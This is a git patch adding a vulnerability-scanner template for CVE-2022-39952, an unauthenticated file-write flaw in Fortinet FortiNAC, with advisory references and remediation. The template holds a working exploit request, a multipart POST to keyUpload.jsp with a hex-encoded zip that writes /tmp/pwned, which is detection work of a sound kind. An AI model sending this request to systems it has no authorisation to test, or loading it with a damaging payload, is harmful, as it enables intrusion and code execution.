From 8f6f8895fda1cec111c78f48dcadf1ebfe7b8f7f Mon Sep 17 00:00:00 2001
From: Dwi Siswanto <me@dw1.io>
Date: Tue, 21 Feb 2023 22:47:52 +0700
Subject: [PATCH] add CVE-2022-39952

---
 cves/2022/CVE-2022-39952.yaml | 45 +++++++++++++++++++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 cves/2022/CVE-2022-39952.yaml

diff --git a/cves/2022/CVE-2022-39952.yaml b/cves/2022/CVE-2022-39952.yaml
new file mode 100644
index 0000000000..a59029d464
--- /dev/null
+++ b/cves/2022/CVE-2022-39952.yaml
@@ -0,0 +1,45 @@
+id: CVE-2022-39952
+
+info:
+  name: FortiNAC Unauthenticated Arbitrary File Write
+  author: dwisiswant0
+  severity: critical
+  description: |
+    A external control of file name or path in Fortinet FortiNAC versions
+    9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11,
+    8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, 8.3.7
+    may allow an unauthenticated attacker to execute unauthorized code or
+    commands via specifically crafted HTTP request.
+  reference:
+    - https://www.fortiguard.com/psirt/FG-IR-22-300
+    - https://www.horizon3.ai/fortinet-fortinac-cve-2022-39952-deep-dive-and-iocs/
+  remediation: Upgrade to FortiNAC version 9.4.1, 9.2.6, 9.2.6, 9.1.8, 7.2.0 or above
+  tags: fortinet,fortinac,cve,cve2022,fileupload,rce
+
+variables:
+  boundaryId: "{{hex_encode(rand_text_alphanumeric(16))}}"
+  payloadHex: "504b030414000000000031b155567e5304d9050000000500000009000000746d702f70776e656470776e6564504b0102140314000000000031b155567e5304d90500000005000000090000000000000000000000b48100000000746d702f70776e6564504b05060000000001000100370000002c0000000000"
+  # payloadHex = /tmp/pwned, content "pwned"
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/configWizard/keyUpload.jsp"
+      - "{{BaseURL}}:8443/configWizard/keyUpload.jsp"
+    headers:
+      Content-Type: "multipart/form-data; boundary={{boundaryId}}"
+    body: |
+      --{{boundaryId}}
+      Content-Disposition: form-data; name="key"; filename="{{to_lower(rand_text_alphanumeric(8))}}.zip"
+
+      {{hex_decode(payloadHex)}}
+      --{{boundaryId}}--
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "zipUploadSuccess"
+          - "SuccessfulUpload"
+        condition: and